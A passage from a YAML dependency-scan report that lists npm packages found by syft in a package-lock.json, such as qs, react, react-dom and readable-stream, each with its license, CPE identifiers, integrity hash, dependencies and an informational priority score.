pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4d4da368c4cb9e85
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: qs 6.15.1'
title: qs 6.15.1
description: 'Package discovered: qs 6.15.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 994fc27bb4c175c9
name: qs
version: 6.15.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:qs_project:qs:6.15.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/qs@6.15.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/qs/-/qs-6.15.1.tgz
integrity: sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg==
dependencies:
side-channel: ^1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 53a30fbc709808bd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: queue 6.0.2'
title: queue 6.0.2
description: 'Package discovered: queue 6.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3d2cabf593c9f69a
name: queue
version: 6.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:queue:queue:6.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/queue@6.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/queue/-/queue-6.0.2.tgz
integrity: sha512-iHZWu+q3IdFZFX36ro/lKBkSvfkztY5Y7HMiPlOUjhupPcG2JMfst2KKEpu5XndviX/3UhFbRngUPNKtgvtZiA==
dependencies:
inherits: ~2.0.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ef5b9014e52d743a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: queue-microtask 1.2.3'
title: queue-microtask 1.2.3
description: 'Package discovered: queue-microtask 1.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 254ae16d84fc4780
name: queue-microtask
version: 1.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:queue-microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:queue-microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:queue_microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:queue_microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:queue:queue-microtask:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:queue:queue_microtask:1.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/queue-microtask@1.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz
integrity: sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cbdbab233debac3e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: range-parser 1.2.1'
title: range-parser 1.2.1
description: 'Package discovered: range-parser 1.2.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4bcca27d3d8ccfdd
name: range-parser
version: 1.2.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:range-parser:range-parser:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:range-parser:range_parser:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:range_parser:range-parser:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:range_parser:range_parser:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:range:range-parser:1.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:range:range_parser:1.2.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/range-parser@1.2.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz
integrity: sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7d9cd0e4ae47337e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: raw-body 2.5.3'
title: raw-body 2.5.3
description: 'Package discovered: raw-body 2.5.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 62bf6c85ca605f5a
name: raw-body
version: 2.5.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:raw-body:raw-body:2.5.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:raw-body:raw_body:2.5.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:raw_body:raw-body:2.5.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:raw_body:raw_body:2.5.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:raw:raw-body:2.5.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:raw:raw_body:2.5.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/raw-body@2.5.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/raw-body/-/raw-body-2.5.3.tgz
integrity: sha512-s4VSOf6yN0rvbRZGxs8Om5CWj6seneMwK3oDb4lWDH0UPhWcxwOWw5+qk24bxq87szX1ydrwylIOp2uG1ojUpA==
dependencies:
bytes: ~3.1.2
http-errors: ~2.0.1
iconv-lite: ~0.4.24
unpipe: ~1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aa3b52d55574a475
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: react 18.3.1'
title: react 18.3.1
description: 'Package discovered: react 18.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 405f6eb700866b5f
name: react
version: 18.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:react:react:18.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/react@18.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/react/-/react-18.3.1.tgz
integrity: sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ==
dependencies:
loose-envify: ^1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 36e9f0b5d3cd995c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: react-dom 18.3.1'
title: react-dom 18.3.1
description: 'Package discovered: react-dom 18.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 98bcef2cdcc9941a
name: react-dom
version: 18.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:react-dom:react-dom:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-dom:react_dom:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_dom:react-dom:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_dom:react_dom:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react-dom:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react_dom:18.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/react-dom@18.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/react-dom/-/react-dom-18.3.1.tgz
integrity: sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw==
dependencies:
loose-envify: ^1.1.0
scheduler: ^0.23.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 19cfc2419956329b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: react-is 16.13.1'
title: react-is 16.13.1
description: 'Package discovered: react-is 16.13.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0db53ea4a0e10790
name: react-is
version: 16.13.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:react-is:react-is:16.13.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-is:react_is:16.13.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_is:react-is:16.13.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_is:react_is:16.13.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react-is:16.13.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react_is:16.13.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/react-is@16.13.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz
integrity: sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 320c91417fe22e47
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: react-is 18.3.1'
title: react-is 18.3.1
description: 'Package discovered: react-is 18.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 756017d5bfb89c54
name: react-is
version: 18.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:react-is:react-is:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-is:react_is:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_is:react-is:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_is:react_is:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react-is:18.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react_is:18.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/react-is@18.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz
integrity: sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e00babcb3a543f4c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: react-promise-suspense 0.3.4'
title: react-promise-suspense 0.3.4
description: 'Package discovered: react-promise-suspense 0.3.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 74a57b2250b339b3
name: react-promise-suspense
version: 0.3.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:react-promise-suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-promise-suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_promise_suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_promise_suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react-promise-suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react_promise_suspense:0.3.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/react-promise-suspense@0.3.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/react-promise-suspense/-/react-promise-suspense-0.3.4.tgz
integrity: sha512-I42jl7L3Ze6kZaq+7zXWSunBa3b1on5yfvUW6Eo/3fFOj6dZ5Bqmcd264nJbTK/gn1HjjILAjSwnZbV4RpSaNQ==
dependencies:
fast-deep-equal: ^2.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 45e27e6a5bb4b37b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: react-smooth 4.0.4'
title: react-smooth 4.0.4
description: 'Package discovered: react-smooth 4.0.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 646f82a1b8ded3b2
name: react-smooth
version: 4.0.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:react-smooth:react-smooth:4.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-smooth:react_smooth:4.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_smooth:react-smooth:4.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_smooth:react_smooth:4.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react-smooth:4.0.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react_smooth:4.0.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/react-smooth@4.0.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/react-smooth/-/react-smooth-4.0.4.tgz
integrity: sha512-gnGKTpYwqL0Iii09gHobNolvX4Kiq4PKx6eWBCYYix+8cdw+cGo3do906l1NBPKkSWx1DghC1dlWG9L2uGd61Q==
dependencies:
fast-equals: ^5.0.1
prop-types: ^15.8.1
react-transition-group: ^4.4.5
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8e8ac167acac7b76
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: react-transition-group 4.4.5'
title: react-transition-group 4.4.5
description: 'Package discovered: react-transition-group 4.4.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 15c7effc6183b848
name: react-transition-group
version: 4.4.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:react-transition-group:react-transition-group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-transition-group:react_transition_group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_transition_group:react-transition-group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_transition_group:react_transition_group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-transition:react-transition-group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react-transition:react_transition_group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_transition:react-transition-group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react_transition:react_transition_group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react-transition-group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:react:react_transition_group:4.4.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/react-transition-group@4.4.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz
integrity: sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g==
dependencies:
'@babel/runtime': ^7.5.5
dom-helpers: ^5.0.1
loose-envify: ^1.4.0
prop-types: ^15.6.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0cce3cd1fd3c13cf
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: read-cache 1.0.0'
title: read-cache 1.0.0
description: 'Package discovered: read-cache 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5f64d7de79050a02
name: read-cache
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:read-cache:read-cache:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:read-cache:read_cache:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:read_cache:read-cache:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:read_cache:read_cache:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:read:read-cache:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:read:read_cache:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/read-cache@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz
integrity: sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==
dependencies:
pify: ^2.3.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c7ae55737c4393af
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: readable-stream 2.3.8'
title: readable-stream 2.3.8
description: 'Package discovered: readable-stream 2.3.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: deca1a198ab80d23
name: readable-stream
version: 2.3.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:readable-stream:readable-stream:2.3.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable-stream:readable_stream:2.3.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable_stream:readable-stream:2.3.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable_stream:readable_stream:2.3.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable:readable-stream:2.3.8:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable:readable_stream:2.3.8:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/readable-stream@2.3.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz
integrity: sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==
dependencies:
core-util-is: ~1.0.0
inherits: ~2.0.3
isarray: ~1.0.0
process-nextick-args: ~2.0.0
safe-buffer: ~5.1.1
string_decoder: ~1.1.1
util-deprecate: ~1.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 303fe49ee8d1f69a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: readable-stream 3.6.2'
title: readable-stream 3.6.2
description: 'Package discovered: readable-stream 3.6.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 066e44c97461677f
name: readable-stream
version: 3.6.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:readable-stream:readable-stream:3.6.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:readable-stream:readable_stream:3.6.2:*:*:*:*:*:*:*
source: syft-generated
